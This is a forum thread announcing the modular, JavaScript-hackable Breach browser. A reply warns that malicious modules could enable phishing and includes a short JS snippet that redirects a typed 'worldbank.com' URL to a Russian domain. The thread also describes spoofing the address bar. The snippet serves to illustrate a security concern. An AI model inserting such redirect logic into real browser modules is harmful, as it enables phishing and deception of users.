Breach.cc Browser for the HTML5-era

Status
Not open for further replies.

Ink

Administrator
Thread author
Verified
Staff Member
Well-known
Jan 8, 2011
22,361
Breach - breach.cc

Modular
Everything in the browser is a module, a web-app running in its own process.
Construct your own browsing experience by selecting the right modules for you.​

Hackable
Want vertical tabs? Write some JS & CSS! Customised autocomplete engine? JS!
Every behavior is programmatic and exposed through APIs.​

Open Source
The entire technological stack is opensource.
Modify existing modules and create your owns to extend the behavior of Breach​

Please note, this is a Public Alpha and currently for Mac and Linux.

A few simple ingredients to make magic happen.
layer-01.png

HTML / JS / CSS
The entire UI is built out of interchangeable modules coded in pure Javascript / HTML5.
Each module is a web-app with access to the Breach API.

layer-02.png

Chromium
The Chromium Content API is exposed to Node JS through v8 native bindings and multiplexed to modules.
Security and performance is at the heart of the design, tabs and modules run in separate processes.

layer-03.png

Node.js
Breach embeds a NodeJS event loop in charge of running the core browser javascript implementation.
Each module is run in its own NodeJS process and interacts with the core browser through IPC.

Find out more: http://breach.cc/2014/07/09/we-ve-come-a-long-way-breach-public-alpha-release.html
 

Cowpipe

Level 16
Verified
Well-known
Jun 16, 2014
781
I worry about this, the ability to modify the entire browsers functionality with Javascript modules. That gives an awful lot of power to a malicious module, should it manage by whatever means to sneak into the user's Breach browser configuration. In a phishing attack for example, the address bar could be directly modified to display a specific address on detection of a certain page being present. It could simply be set simply to "http://www.worldbank.com" which would appear to the user that they were on worldbank.com when actually they were visiting "http://scup0u.eqbijnet.ru" or whatever.

A module called mod_strip controls the value of the address box. Perhaps somewhat unknowingly the devs own webpage gives the perfect tutorial in how to construct a phishing attack within Breach :p

Changing the behaviour of mod_strip
We're going to add some extra logic to the module, by intercepting a certain string of character submitted in the URL box and associating with it a special action.
Source: http://breach.cc/hack/

The following code will intercept the string "http://www.worldbank.com" and redirect the user to "http://scup0u.eqbijnet.ru" (a pretty lame phishing attack, but it's just a quick and dirty example) ;)

Code:
socket_submit = function(data) {
if(data.input === 'http://www.worldbank.com') {
common._.tabs.action_load("http://scup0u.eqbijnet.ru");
return;
}

Obviously an actual, real world attack, would be more difficult to implement and I haven't really been through the full security yet, just glanced over things, but I think the main point of all of this is that for an average user to download and use this browser, is almost as dangerous as dropping a baby in the middle of a busy street and giving it a handgun with a brightly coloured trigger...

The more power we give those who don't know how to use it, the more power we are giving those who do.
 
  • Like
Reactions: KelvinW4 and Oxygen
Status
Not open for further replies.

About us

  • MalwareTips is a community-driven platform providing the latest information and resources on malware and cyber threats. Our team of experienced professionals and passionate volunteers work to keep the internet safe and secure. We provide accurate, up-to-date information and strive to build a strong and supportive community dedicated to cybersecurity.

User Menu

Follow us

Follow us on Facebook or Twitter to know first about the latest cybersecurity incidents and malware threats.

Top